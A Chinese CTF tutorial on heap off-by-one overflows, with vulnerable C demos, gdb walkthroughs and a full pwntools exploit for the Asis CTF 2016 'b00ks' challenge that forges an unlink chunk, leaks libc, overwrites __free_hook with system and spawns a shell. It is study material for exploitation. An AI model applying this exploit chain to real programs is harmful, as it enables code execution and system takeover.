只溢出一个字节,比如定义的数组是 a[4],在操作的时候却操作 a[4],实际上数组最大是到 a[3] 的

利用思路

  1. 溢出字节为可控制任意字节:通过修改大小造成块结构之间出现重叠,从而泄露其他块数据,或是覆盖其他块数据。

  2. 溢出字节为 NULL 字节:在 size 为 0x100 的时候,溢出 NULL 字节可以使得 prev_in_use 位被清,这样前块会被认为是 free 块。这时可以选择使用 unlink 方法进行处理。另外,这时 prev_size 域就会启用,就可以伪造 prev_size ,从而造成块之间发生重叠。此方法的关键在于 unlink 的时候没有检查按照 prev_size 找到的块的后一块(理论上是当前正在 unlink 的块)与当前正在 unlink 的块大小是否相等

看个例子

首先看一个数组的例子

可以看下面源码,他 for(i=0;i<=size;i++) 里面那个 i<=size 是有问题的,这样会多循环一次

  1. //gcc -g 1.c
  2. int my_gets(char *ptr,int size)
  3. {
  4. int i;
  5. for(i=0;i<=size;i++)
  6. {
  7. ptr[i]=getchar();
  8. }
  9. return i;
  10. }
  11. int main()
  12. {
  13. void *chunk1,*chunk2;
  14. chunk1=malloc(16);
  15. chunk2=malloc(16);
  16. puts("Get Input:");
  17. my_gets(chunk1,16);
  18. return 0;
  19. }

首先 b *main 下个断点,然后运行到第六行也就是等待输入的那块

p ptr 看一下 ptr 指向的是哪一个地址
x/10gx 0x602010-0x10 然后查看一下那一块的内存,减去 0x10 是因为 chunk 前面要记录一些信息,比如前 0x8 如果前一个是空闲的话就记录前一个 chunk 的大小,否则就给前一个用来存数据。后面 0x8 记录的分别是该 chunk 的大小和 A、M、P 标志位
A(NON_MAIN_ARENA)表示 chunk 属于主分配区(1)或者非主分配区(0)
M(IS_MAPPED)表示当前 chunk 是否是由 mmap 分配的,M 为 1 表示该 chunk 是从 mmap 映射区域分配的,否则是从 heap 区域分配的
P(PREV_INUSE)表示前一个 chunk 有 (1) 没有 (0) 被使用,一般来说第一个被分配的 chunk 的这个位会标记为 1,来防止访问到非法内存

image.png

然后再运行的话就要接收我们的输入了,我们输入 17 个字符,以为前面源码中写的 my_gets(chunk1,16); 是 16 个,可以看到把第二个 chunk 的低一字节改成了 0x41

image.png

下面看一个字符串的例子

strlen 在计算长度的时候不会把结束符 ‘\x00’ 计算在内,strcpy 在拷贝的时候会把 ‘\x00’ 也算上,所以就会造成 off by one

  1. //gcc -g 2.c
  2. int main(void)
  3. {
  4. char buffer[40]="";
  5. void *chunk1;
  6. chunk1=malloc(24);
  7. puts("Get Input");
  8. gets(buffer);
  9. if(strlen(buffer)==24)
  10. {
  11. strcpy(chunk1,buffer);
  12. }
  13. return 0;
  14. }

先 b *main 上下个断点,然后运行到输入的那个位置,在这之前先看一下 chunk 的情况

image.png

输入 24 个 A,等他拷贝完之后,再看一下会发现原本的那低一字节已经被写成 \x00 了

image.png

例题

Asis CTF 2016 b00ks

image.png

首先看一下 create a book 功能:
首先要输一下书名的大小,然后会申请这么大的空间,然后通过 sub_9f5 这个函数往这个空间输入书名

image.png

这个函数的定义有问题,他会多置一个 0
传入的两个参数分别对应上面的 ptr 和 v1-1,地址和大小

image.png

如果我们输入的长度跟之前设定的长度一样的话,因为有个 ++buf,所以 break 之后会多写一个 0
我们再来看一下定义的 book 的结构体,注意有的是 DWORD,有的是 QWORD

image.png

一开始要输入作者的名字 32 字节

image.png

他会多输一个 \x00,然后会被后面的 book 的结构体指针给覆盖掉 。这俩的关系可能有点不好理解,在 IDA 里可以看到,他这个 off_202018 反而在 off_202010 的上面,正好是相差 0x20,也就是 32 字节

image.png

image.png

如果一开始的 name 输的是 32 字节,当是哟个第四个功能打印书的信息的时候,这个 name 会在 Author 那里,会连带着把后面的存放的书籍的结构体指针打印出来,这样就拿到了 heap 的地址

image.png

找到这个结构体的位置之后来查看一下他们,首先是 id,然后是 name 的指针,然后是 des(description)的指针,然后是 des 的 size

image.png
通过这个图片演示一下怎么找?菜鸡找到这些能对应起来的东西感觉很爽!?

经过两个 create 和 remove 之后,后面成了 book4、5、6
heap_base 这个 gdb 看看内存就知道了,一开始是申请了 0x1010 的,加上后面的这些合起来

image.png

然后通过 editor 对 book4 的描述进行改写,写成:
p64(0) + p64(0x101) + p64(ptr - 0x18) + p64(ptr - 0x10) + '\x00' * 0xe0 + p64(0x100)
ptr 是 book4 的 desc 指针所在的位置,通过上面的布局待会 unlink 之后就会达成这样的效果:把 ptr 这里的值(也就是 book4 的 desc 指针)改为 ptr-0x18,这样 edit book4 的时候实际就是往 ptr-0x18 这里写

没发送之前:

image.png

发送后:写入的内容总共是 8\8\8\8\224\8,总共 33 gx

image.png

通过对 book4 的 des 进行改写,把 book5 的 des 堆块的 P 状态给覆盖为了 0
同时构造了一个 fake chunk 它的 fd 和 bk 分别是 p64(0x555555758180 - 0x18) 和 p64(0x555555758180 - 0x10),这里这个 0x555555758180 就是 book4 的 des 指针存放的位置

然后对 book5 进行 remove,因为前一个 chunk 是 free 的,所以会 unlink 会把 book4 的 des 指针改成 book4 的des 指针的位置减去 0x18,然后再次编辑 book4,这时候编辑的实际是 book4 的结构体,通过这次操作把 book4 的 des 指针改成 book6 的 des 指针所在的位置

image.png

image.png

写完之后的样子

image.png

这时候修改 book4 的 des 就是修改 book6 结构体的 des 指针,可以通过这个来进行任意位置读写

定义了两个函数

  1. def write_to(addr, content, size):
  2. edit(4, p64(addr) + p64(size + 0x100) + '\n')
  3. edit(6, content + '\n')
  4. def read_at(addr):
  5. edit(4, p64(addr) + '\n')
  6. cmd(4)
  7. p.recvuntil('Description: ')
  8. p.recvuntil('Description: ')
  9. p.recvuntil('Description: ')
  10. content = p.recvline()[:-1]
  11. p.info(content)
  12. return content

write_to 函数解释
首先通过 edit 4 把 book6 的 des 指针改成了想要修改的那个,在结构体中 des 指针后面是 des 的大小
然后使用 edit 6 的时候就能够编辑 des 指针指向的那个位置了的内容了

read_at 函数解释
首先通过 edit4 把 book6 的 des 指针改成想要看的那一个地址,然后打印出来

有了这两个函数,先把 libc 的地址给泄露出来,这里是看的 book5 的 des,因为 book5 free 掉了,所以里面是 unsortedbin 的地址,他跟 libc 的基址固定偏移 0x3c4b78

  1. libc_leak = u64(read_at(heap_base + 0x11e0).ljust(8, '\x00')) - 0x3c4b78
  2. p.info('libc leak @ 0x%x' % libc_leak)

然后把 free_hook 改成 system

  1. write_to(libc_leak + libc.symbols['__free_hook'], p64(libc_leak + libc.symbols['system']), 0x10)

再去 remove(6) 一下就可以拿到 shell 了,book6 的 name 已经放着 /bin/sh 了,当 free 的时候就是 system(‘/bin/sh’) 了

完整的 exp

  1. #! /usr/bin/env python2
  2. # -*- coding: utf-8 -*-
  3. # vim:fenc=utf-8
  4. import sys
  5. import os
  6. import os.path
  7. from pwn import *
  8. #context(os='linux', arch='amd64', log_level='debug')
  9. p=process('./b00ks')
  10. #p=remote('node3.buuoj.cn',26386)
  11. def cmd(choice):
  12. p.recvuntil('> ')
  13. p.sendline(str(choice))
  14. def create(book_size, book_name, desc_size, desc):
  15. cmd(1)
  16. p.recvuntil(': ')
  17. p.sendline(str(book_size))
  18. p.recvuntil(': ')
  19. if len(book_name) == book_size:
  20. p.send(book_name)
  21. else:
  22. p.sendline(book_name)
  23. p.recvuntil(': ')
  24. p.sendline(str(desc_size))
  25. p.recvuntil(': ')
  26. if len(desc) == desc_size:
  27. p.send(desc)
  28. else:
  29. p.sendline(desc)
  30. def remove(idx):
  31. cmd(2)
  32. p.recvuntil(': ')
  33. p.sendline(str(idx))
  34. def edit(idx, desc):
  35. cmd(3)
  36. p.recvuntil(': ')
  37. p.sendline(str(idx))
  38. p.recvuntil(': ')
  39. p.send(desc)
  40. def author_name(author):
  41. cmd(5)
  42. p.recvuntil(': ')
  43. p.send(author)
  44. libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
  45. def main():
  46. p.recvuntil('name: ')
  47. p.sendline('x' * (0x20 - 5) + 'leak:')
  48. create(0x20, 'tmp a', 0x20, 'b') # 1
  49. cmd(4)
  50. p.recvuntil('Author: ')
  51. p.recvuntil('leak:')
  52. heap_leak = u64(p.recvline().strip().ljust(8, '\x00'))
  53. p.info('heap leak @ 0x%x' % heap_leak)
  54. heap_base = heap_leak - 0x1080
  55. #0x0000555555758080 - 0x1080 = 0x555555757000
  56. create(0x20, 'buf 1', 0x20, 'desc buf') # 2
  57. create(0x20, 'buf 2', 0x20, 'desc buf 2') # 3
  58. remove(2)
  59. remove(3)
  60. ptr = heap_base + 0x1180
  61. payload = p64(0) + p64(0x101) + p64(ptr - 0x18) + p64(ptr - 0x10) + '\x00' * 0xe0 + p64(0x100)
  62. create(0x20, 'name', 0x108, 'overflow') # 4
  63. create(0x20, 'name', 0x100 - 0x10, 'target') # 5
  64. create(0x20, '/bin/sh\x00', 0x200, 'to arbitrary read write') # 6
  65. edit(4, payload)
  66. remove(5)
  67. edit(4, p64(0x30) + p64(4) + p64(heap_base + 0x11a0) + p64(heap_base + 0x10c0) + '\n')
  68. def write_to(addr, content, size):
  69. edit(4, p64(addr) + p64(size + 0x100) + '\n')
  70. edit(6, content + '\n')
  71. def read_at(addr):
  72. edit(4, p64(addr) + '\n')
  73. cmd(4)
  74. p.recvuntil('Description: ')
  75. p.recvuntil('Description: ')
  76. p.recvuntil('Description: ')
  77. content = p.recvline()[:-1]
  78. p.info(content)
  79. return content
  80. libc_leak = u64(read_at(heap_base + 0x11e0).ljust(8, '\x00')) - 0x3c4b78
  81. p.info('libc leak @ 0x%x' % libc_leak)
  82. write_to(libc_leak + libc.symbols['__free_hook'], p64(libc_leak + libc.symbols['system']), 0x10)
  83. remove(6)
  84. p.interactive()
  85. if __name__ == '__main__':
  86. main()

plaidctf 2015 plaiddb

我人傻了,红黑树是什么东西!?
啊啊啊啊啊,真的菜哭了